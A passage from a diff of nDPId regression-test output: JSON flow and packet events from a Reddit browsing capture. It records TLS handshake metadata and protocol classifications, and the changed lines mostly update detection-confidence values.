CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":807,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":818,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686084,"flow_last_seen":1605291686183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686183,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686301,"flow_last_seen":1605291686301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605291686301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686301,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3ML0AAAAAoAL9IDDZAAACBAWgBAIICql05vEAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605291686327,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686327,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdEkHBFWUkNzC+oBJXgILuAAACBAV4AQMDAwQCCArC1zmoqXTm8Q=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1605291686327,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686327,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3ML5BwRVmgBAB+wbmAAABAQgKqXTnC8LXOag="} 
-00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1211,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686301,"flow_last_seen":1605291686327,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686327,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1398,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686301,"flow_last_seen":1605291686419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686419,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01318{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686301,"flow_last_seen":1605291686420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686420,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","server_names":"*.thumbs.redditmedia.com,thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.thumbs.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:F4:6C:CF:D6:FD:64:3E:50:17:A2:DE:B0:F2:B6:9B:76:59:C6:75"}} +00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1211,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686301,"flow_last_seen":1605291686327,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686327,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1398,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686301,"flow_last_seen":1605291686419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686419,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01318{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686301,"flow_last_seen":1605291686420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686420,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","server_names":"*.thumbs.redditmedia.com,thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.thumbs.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:F4:6C:CF:D6:FD:64:3E:50:17:A2:DE:B0:F2:B6:9B:76:59:C6:75"}} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686985,"flow_last_seen":1605291686985,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686985,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605291686985,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686985,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duD88AAAAAoAL9IJsfAAACBAWgBAIIClRf4AwAAAAAAQMDBw=="} 
00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1926,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686985,"flow_last_seen":1605291686985,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686985,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -153,73 +153,73 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1927,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605291686996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686996,"pkt":"qtsDr8lk5EKm5WPyht1gCh2fACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7O2lbABu20FmjEAAAAAoAL9ILJdAAACBAWgBAIICnOjJUYAAAAAAQMDBw=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1928,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605291687016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687016,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHENPm6q63bg\/QoBJXgIMUAAACBAV4AQMDAwQCCArC1zxZVF\/gDA=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1929,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1605291687016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687016,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duD9DT5uqvgBAB+wcHAAABAQgKVF\/gK8LXPFk="} 
-00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1930,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687016,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687016,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1930,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687016,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687016,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1931,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687024,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGhTs7YqAcsBIEmLB5kd7IUo3\/YpAbuVsAnf\/VJtBZoyoBJXgFGuAAACBAV4AQMDAwQCCArC1zxhc6MlRg=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1932,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687024,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAA35IcYqAcsBIEmLB5kd7IUo3\/YpAbup5BqPq4R5AeISoBJXgAGtAAACBAV4AQMDAwQCCArC1zxhS\/piSQ=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1933,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687024,"pkt":"qtsDr8lk5EKm5WPyht1gCh2fACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7O2lbABu20FmjIJ3\/1TgBAB+9WjAAABAQgKc6MlYsLXPGE="} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1934,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687024,"pkt":"qtsDr8lk5EKm5WPyht1gDjDtACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAN+SHGqeQBu3kB4hIaj6uFgBAB+4WXAAABAQgKS\/picMLXPGE="} -00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1935,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686996,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1936,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1938,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687060,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1949,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687075,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686996,"flow_last_seen":1605291687096,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687096,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 